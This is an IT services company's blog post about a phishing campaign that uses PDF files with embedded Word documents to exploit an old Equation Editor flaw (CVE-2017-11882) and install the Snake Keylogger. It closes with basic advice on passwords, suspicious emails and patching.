The battle against malware constantly evolves as hackers find new ways to smuggle their destructive or malicious malware onto your devices. As most people are now wary of opening Word files or spreadsheets, hackers have turned to a type of file that most people believe to be safe—the humble pdf file.
Cybersecurity researchers at HP Wolf Security were the first to be alerted to the new threat, which uses pdf files to sneak the Snake Keylogger into vulnerable devices. Threat actors launch their attack by sending an email with a subject line including the words “Remittance Invoice” (misspelled in this way), tricking the recipient into believing they are getting paid for something.
The recipient then downloads the pdf, secure in the knowledge that pdf files are “safe.” However, once they open the pdf file, they discover that there is an embedded Word file entitled “has been verified.” They are then shown a prompt asking them whether or not to open the embedded Word document, saying that it has been verified, potentially misleading them into thinking their pdf reader has checked the document. Unfortunately, files embedded in pdfs, such as xlsx, jpeg, or docx files, can contain viruses, macros, or programs that can be harmful.
Exploiting a Known Bug
Once the Word document is opened in unprotected view, Word will download an RTF (Rich Text Format) file from a web server, which begins to run alongside the open document. This file connects to a URL that is not on a legitimate Office domain and downloads a further RTF file containing two “not well-formed” OLE (Object Linking and Embedding) objects that use shellcode exploiting CVE-2017-11882, a remote code execution vulnerability (RCE) in Equation Editor.
Equation Editor is an app within Word that many people won’t even be aware of, although it is included as standard. It is used to create and edit complex equations and insert them into Word documents and is mainly used by engineers and academics. As its final step, the code decrypts a ciphertext that is also shellcode, which is then executed, leading to an executable called fresh.exe. This program then loads the Snake Keylogger.
Microsoft patched this vulnerability in 2017, so well-maintained systems will not be affected. However, not all administrators keep their systems fully up-to-date, so many systems may still be vulnerable to this flaw. Interestingly, the history behind this goes back even further; the defect already existed 17 years before the patch was issued, so this vulnerability has now been around for 22 years.
What is the Snake Keylogger?
The Snake Keylogger is not a new piece of malware written for this particular hack. It first appeared in late 2020 and, by July 2021, was being described as one of the top cybersecurity threats by cybersecurity experts.
The Snake Keylogger is designed primarily to steal credentials. Like all keyloggers, it records every keystroke on the keyboard of an infected device. By doing this, the Snake Keylogger can quickly build a picture of the user’s user names and passwords for shopping sites, social media, and banking apps. As many users use the same password for different sites, they can quickly become highly compromised. The threat actor with access to this information can either use the information themselves for identity theft or fraud or sell it to bidders on the dark web.
The Snake Keylogger is particularly evasive and persistent, making it difficult to detect on an infected system and challenging to remove even when it is detected. Underground forums for hackers are currently offering it for sale at prices ranging between $25 and $100, depending on the level of service the buyer is prepared to pay for.
How to Avoid the Risks Posed by Malware
As with most cybersecurity risks, there are several relatively simple methods of protecting yourself from malware and its risks. If you don’t have the resources to employ cybersecurity experts, there are cost-effective spyware and malware detection software solutions on the market and some excellent firewall programs. In addition, you can take these three simple steps:
1. Passwords
Most people don’t take their password protection seriously enough, using either passwords that aren’t strong enough, using the same one across multiple sites, or both. It’s best to use passwords that include upper and lower case letters, numbers, and special characters (+,=, £,%, etc.) and make it a minimum of eight characters long. Of course, it will be difficult to remember every one if you have a different password on dozens of sites, so you might consider using a password manager. We recommend Bitwarden.
Of course, there are drawbacks to this, too, as some password managers use an auto-type function to input passwords, which keyloggers will pick up. Advance keyloggers like Snake will also take occasional screenshots to pick up passwords that way. Finally, other malware targets offline password databases and will pick all the passwords up in one go.
2. Beware of Suspicious Emails
Being cautious with email attachments is something we should all be doing these days. If you receive an email from an unknown sender, never open any attachments unless you can verify their authenticity. Even when you know the sender, it’s good practice to think before opening an attachment, as their email may have been compromised. Is the email the sort of thing they would usually send? Do they ever send you attachments? If in doubt, you can always get in touch and ask the sender. At worst, you’ve wasted a few moments; at best, you’ve protected yourself from a potentially devastating cyber attack.
3. System Maintenance
The threat discovered by HP Wolf Security only worked by exploiting an old software vulnerability for which a patch already exists. You would think that after four years, few people would not have downloaded the patch. Unfortunately, this is not the case, and many people go for years without performing maintenance and updates.
If you use a piece of software regularly, set a day each month to run updates. But don’t just limit it to that; your operating system can be compromised too. Set regular updates for your OS to close any vulnerabilities that have been patched. It might feel time-consuming to wait for those updates to run, but the risks of not doing so far outweigh the loss of a few minutes every week or month. Also, the more often you run maintenance, the less time it will take.
Northstarr Recommendations
The internet can be fun, helpful, informative, and help us be more productive. However, like everything else, there can be danger lurking there. The most important thing you can do to protect yourself is take time to learn the Dos and Don’ts of the internet. Be careful out there, and be good to yourself, and each other.
To find out more about how we can help, visit our website or give us a call at (888) 767-2210 to set up an appointment. We look forward to meeting with you!
